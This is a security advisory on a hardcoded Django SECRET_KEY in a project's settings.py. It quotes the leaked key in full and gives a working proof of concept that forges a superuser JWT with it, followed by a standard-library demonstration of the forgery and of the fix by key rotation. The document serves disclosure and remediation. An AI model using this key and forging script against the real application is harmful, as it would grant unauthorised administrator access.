Vulnerable File
WebsiteGuide/settings.py (Line 23)
SECRET_KEY = 'm0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x'
Vulnerability Type
Hardcoded Cryptographic Key
Impact
If the application's JWT library signs tokens with settings.SECRET_KEY (the default for djangorestframework-simplejwt, whose SIGNING_KEY falls back to it), anyone with read access to the repository can:
Forge JWT tokens carrying arbitrary claims (e.g., is_superuser=True).
Bypass authentication to reach restricted endpoints or administrative functionality.
Impersonate any user, including escalating to an administrator account.
The same key also signs Django session cookies (signed-cookie backend), password-reset tokens and anything built on django.core.signing, so the exposure is not limited to JWTs.
Proof of Concept (POC)
```python
import jwt  # PyJWT
import time

# Hardcoded secret key extracted from WebsiteGuide/settings.py
secret = "m0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x"

# Malicious payload with elevated privileges
payload = {
    "user_id": 1,
    "username": "admin",
    "exp": time.time() + 14400,  # token valid for 4 hours
    "email": "null",
    "is_superuser": True,        # privilege escalation
}

# Sign the payload with the leaked key; the server cannot tell this
# token apart from one it issued itself
forged_token = jwt.encode(payload, secret, algorithm="HS256")
print(f"Forged JWT Token: {forged_token}")
```
Send the forged token to a protected API endpoint (e.g. in an `Authorization: Bearer <token>` header). A successful response from an endpoint that should require an authenticated administrator is the proof of authentication bypass.
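The following is an added example (not the reporter's PoC and not the project's code) that shows both halves of the problem without needing PyJWT: it mints the same HS256 token with the standard library, runs it through a server-side check that behaves like a view keyed on settings.SECRET_KEY, and then repeats the check after the key has been rotated to a value loaded from the environment, which is the fix. The environment variable name `DJANGO_SECRET_KEY` and the rotated key are assumptions constructed for the demonstration; the leaked key is the one quoted in the report.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Optional, Tuple

# The key committed in WebsiteGuide/settings.py, as quoted in the report above.
LEAKED_SECRET = "m0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x"


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, the encoding JWTs use (RFC 7515)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; restores the padding before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_hs256(payload: dict, secret: str) -> str:
    """Mint an HS256 JWT with the standard library only.

    Yields the same token as jwt.encode(payload, secret, algorithm="HS256")
    in the PoC above, so PyJWT is not needed to reproduce the forgery.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    signature = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(signature)


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Server side: return the claims only if alg, signature and expiry check out."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    head, body, sig = parts
    try:
        header = json.loads(b64url_decode(head))
        claims = json.loads(b64url_decode(body))
        presented = b64url_decode(sig)
    except ValueError:  # bad base64, bad JSON or bad UTF-8
        return None
    # Pin the algorithm before trusting anything else ("none"/RS256 confusion).
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, presented):
        return None
    if claims.get("exp", 0) < time.time():
        return None
    return claims


def is_admin(token: str, secret: str) -> bool:
    """What an admin-only view effectively decides from the bearer token."""
    claims = verify_hs256(token, secret)
    return bool(claims and claims.get("is_superuser"))


def load_secret_from_env(var: str = "DJANGO_SECRET_KEY") -> str:
    """Hardened settings.py pattern: SECRET_KEY = load_secret_from_env().

    The variable name is an assumption of this example; the point is that the
    value lives in the deployment environment, never in the repository.
    """
    value = os.environ.get(var)
    if not value:
        raise RuntimeError(f"{var} is not set; refusing to start without a secret")
    return value


def demo() -> Tuple[bool, bool]:
    """Forge the PoC token, then test it against the leaked key and a rotated one."""
    forged = forge_hs256(
        {"user_id": 1, "username": "admin", "exp": time.time() + 14400,
         "email": "null", "is_superuser": True},
        LEAKED_SECRET,
    )
    accepted_by_vulnerable_server = is_admin(forged, LEAKED_SECRET)
    # Simulate the fix: a fresh key supplied by the environment (constructed here).
    os.environ["DJANGO_SECRET_KEY"] = secrets.token_urlsafe(50)
    accepted_after_rotation = is_admin(forged, load_secret_from_env())
    return accepted_by_vulnerable_server, accepted_after_rotation


if __name__ == "__main__":
    print(demo())  # (True, False)
```

Rotating the key invalidates every token, session and signed value minted under the old one, so schedule the change and expect users to re-authenticate; simply deleting the key from the repository without rotating it leaves the forgery working, because the value survives in git history.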